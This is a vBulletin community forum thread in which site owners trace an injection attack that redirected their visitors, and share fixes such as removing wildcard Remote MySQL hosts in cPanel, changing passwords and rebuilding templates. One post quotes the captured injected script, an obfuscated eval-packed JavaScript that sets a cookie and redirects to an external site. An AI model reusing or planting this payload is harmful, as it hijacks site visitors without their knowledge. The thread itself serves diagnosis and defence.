Tweet
-
Yeah that's right, but the site-map exploit was mentioned by Andreas in this topic and because of this Mert added a PL1 update at vb.org, and you're right "participation" doesn't implied you've read all posts regarding this issue
....... -
After reading Merts reply to my question, I never returned to that thread until tonight.
Baby, I was born this wayComment
-
The release Mert mentioned is shown as vbseo_sitemap-3-0_PL1 on the zip file
Seems my own problem with the sitemap errors were down to not setting vbseo to kill non English characters in the urls
Fat fingered user error on that one
I know there has also been another pr update this week which can affect traffic for a few days.Comment
-
Hey Jason, long time...
I removed vbSEO and installed vBulletin CLEAN on June 29. I'm still getting this redirect issue. My traffic went from 800 visits/day last July, crushing my site's pagerank, traffic, etc., to 40-80, and it's remained that way ever since.
I don't know if this is it, but I used Charles to check the response when going to my site and it returned this:
I'm unsure if that is the culprit. I could not find that code anywhere in my database dump nor my files.Code:<html><head></head><body><script type="text/javascript">var vbsp='A0620CB8';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('t a=["\\z\\b\\c\\n\\e\\j\\b","\\k\\b\\c\\n\\e\\j\\b","\\A\\x\\b\\L\\f\\e\\p\\b\\k\\i","\\c\\d\\K\\M\\n\\N\\c\\p\\e\\o\\z","\\q\\d\\d\\J\\e\\b","\\i","\\A\\x\\f\\s\\c\\l\\i\\g","\\D\\F\\k\\f","\\G","\\r\\d\\q\\s\\c\\e\\d\\o","\\l\\c\\c\\f\\H\\g\\g\\j\\P\\Q\\e\\r\\b\\k\\c\\d\\p\\b\\B\\q\\d\\j\\g\\m\\d\\R\\o\\r\\d\\s\\m\\B\\f\\l\\f\\S\\e\\m\\i"];E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};y(a[7],a[8]);v[a[9]]=a[U]+V;',58,58,'||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x76|function|x62|x31|x3A|new|x6B|x47|x78|x4D|x53|Date|x79|x66|x77|x3F|86400000|10|vbsp'.split('|'),0,{}))</script></body></html>Comment
-
Edit: feel free to remove this post. Posted in the wrong place. My apologies.<b>Erik J. Barzeski</b>Comment
-
With the help of the security people at RealWebHost.net, we have now positively identified the method for injecting this exploit as well as specific vulnerabilities that permitted it on a 3.83, since updated to 3.87 PL2: As it turns out, it was a server configuration and security issue combined with some specific attributes of vBulletin installations which gave the intruder direct access to the MySQL database.
The key is first to check your settings in cPanel for Remote MySQL: Unless you are using a database on a remote server, i.e., NOT on localhost, this setting should say "There are no additional MySQL access hosts configured". If you have a specific database intentionally enabled, that too is okay. What should NEVER be there is the character % - this is a wildcard which allows ALL other servers to connect to the database. If you see the wildcard enabled, DELETE IT.
Then, make sure you change your passwords to strong passwords for both cPanel and MySQL to ensure that no one can change this setting back without your knowledge.
Then, pick any add-on, disable it, then re-enable it to clear the datastore.
Finally, download the file tool_reparse.php from http://www.vbulletin.org/forum/showthread.php?t=220967 and let it find discrepancies in your compiled templates and rebuild them.Last edited by djbaxter; Sun 17 Jul '11, 2:19pm.Comment
-
Cheers for that.
1am in the morning here and I have just seen this. Im now in the process of having kittens
Did the database check and found two entries
192.168.1.%
88.148.9.210
Can I just kill those two entries or is the localhost one with the wild card % something to worry about deleting
Thanks for all the hard work and persistence in finding the solution to this
.Comment
-
As far as I know, if you are only using the local MySQL, you shouldn't need ANYTHING listed in MySQL Remote. I own two forums and Admin three others - none of them have any entries under MySQL Remote and they are working just fine. I would delete them both. If you have to, you can always add one of them back.Comment
-
Cheers for that.
I took the brave approach. Checked another cpanel and database I have set up on my server.
And it showed exactly as you said.
Killed both the above without any adverse effect apart from the forums seeming to speed up on page loads
Top man..Comment
-
I was having my second litter of kittens when I checked my cpanel today and found 192.168.1.% had returned
I have been in touch with my server techs and this is the reply they gave, which also clarifies the % wild card hacking
That is part of the MySQL server by default.
Because you can use IP wildcard values in host values (for example, '192.168.1.%' to match every host on a subnet), someone could try to exploit this capability by naming a host 192.168.1.somewhere.com. To foil such attempts, MySQL disallows matching on host names that start with digits and a dot. Thus, if you have a host named something like 1.2.example.com, its name never matches the host part of account names. An IP wildcard value can match only IP numbers, not host names..Comment
-
But it doesn't really clarify it at all. I have a dedicated server with something like 10 databases running over several sites. NONE of them have any entries in MySQL Remote at all. cPanel does not create those entries by default when you set up a database and if you are running sites using MySQL on localhost you do NOT need anything entered in MySQL Remote. Indeed, anything entered in MySQL Remote should be considered suspicious by default unless you are actually using remoted databases (i.e., databases on a separate server).Comment
-
The cpanel glitch I have, is mentioned on the cpanel support forum
Seems like others have experienced the return of 192.168.1.% after they have deleted it
It dont make whats happening right..Comment
-
Looks like I got hit twice in twenty minutes tonight
Had two blank emails turn up twenty minutes apart, using the Check 4 Hack mod
Location of injections reported pluginlist.Comment
-
To reiterate, you can erase it temporarily by disabling and then re-enabling any product but the key is to figure out how the bastard is getting in.
Have you changed your passwords, especially for cPanel and phpMyAdmin? Is your AdminCP folder password protected? Do you have
in the .htaccess file in your root? HAve you removed all entries from MySQL Remote?Code:Options All -Indexes
What version of vBulletin are you running again?Comment
-
Looks like it might have been a false positive this time
As soon as I added evolve chat bar the errors came in
Uninstalled the bar, run the test and the warnings went
Im not taking any chances on this one
Touch wood, my remote access on the database has not come back.Comment
-
Hi at vB,
I am planning to update our site Australian Photoholics Forum "ausph.com" to SSL.
Last time we tried this, we broke our site which was down for a week!
Everyone here... -
Hi,
I was just wondering how you get the URL shorten in Vbulletin 5.1.7 ?
From what I can see you have it done here at vbulletin.com - see url below... there is this number (which... -
Good afternoon.I set ssl whatever forum was on the https protocol, prescribed in your permanent address offline via https, but do not know how to do so, that would be a http version offline (http://f... -
Comment